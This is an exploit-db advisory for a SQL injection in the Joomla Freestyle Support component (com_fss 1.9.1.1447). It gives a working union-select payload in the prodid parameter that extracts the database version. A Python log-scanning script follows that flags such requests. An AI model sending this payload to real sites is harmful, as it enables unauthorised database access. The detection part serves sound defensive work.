Joomla! Component com_fss 1.9.1.1447 – SQL Injection

  • Author: D4NB4R
    Date: 2012-10-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/22097/
  •  Exploit Title: Joomla Freestyle Support com_fss sqli
    
     Dork: N/A
     
     Date: [17-10-2012]
     
     Author: Daniel Barragan "D4NB4R"
     
     Twitter: @D4NB4R
     
     Vendor: http://freestyle-joomla.com
     
     Version: Version 1.9.1.1447 (last update on Oct 15, 2012)
     
     License: Commercial
    
     Download: http://freestyle-joomla.com/fssdownloads
    
     Tested on: [Linux(bt5)-Windows(7ultimate)]
    
     Special greetz: Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt
    
    
    Joomla component description:
    
    Advanced ticketed support/help desk on your website. Includes Knowledge Base, FAQs, Announcements, Glossary, Tickets by Email, Testimonials and many other features. Robust, customizable, professional, affordable and easy to use.
    
    Warning: Invalid argument supplied for foreach() in 
    
    
    Exploit: 
    
    
    SQL : SQL injection
    
     http://127.0.0.1/index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
    
    
    _____________________________________________________
    Daniel Barragan "D4NB4R" 2012
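
A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web access logs for com_fss requests whose prodid is not a plain integer. The log lines are constructed, and the rule that legitimate prodid values are short integers is an assumption, not something the advisory states.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [19/Oct/2012:10:00:01 +0000] "GET /index.php?option=com_fss&view=test&prodid=12 HTTP/1.1" 200 5120
203.0.113.9 - - [19/Oct/2012:10:00:07 +0000] "GET /index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+1%2Cversion()--+x HTTP/1.1" 200 4890
203.0.113.5 - - [19/Oct/2012:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 7301
203.0.113.9 - - [19/Oct/2012:10:00:11 +0000] "GET /index.php?view=test&prodid=5%20OR%201%3D1&option=com_fss HTTP/1.1" 200 4890
"""

# Client address and request target from a common/combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate prodid is a short decimal integer.
NUMERIC_ID = re.compile(r"\d{1,10}")


def suspicious_prodid_requests(log_text):
    """Return (client_ip, decoded_prodid) for every com_fss request
    whose prodid parameter is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # unparseable line, skip
        ip, target = m.groups()
        # parse_qs URL-decodes values, so %2C and '+' cannot hide the payload
        # and parameter order in the query string does not matter.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_fss" not in params.get("option", []):
            continue
        for value in params.get("prodid", []):
            if not NUMERIC_ID.fullmatch(value):
                hits.append((ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_prodid_requests(SAMPLE_LOG):
        print(f"{ip}\tprodid={value!r}")
```

Matching on "not an integer" rather than on SQL keywords keeps the rule independent of the exact payload, so comment variations and encoding tricks in the value are still flagged.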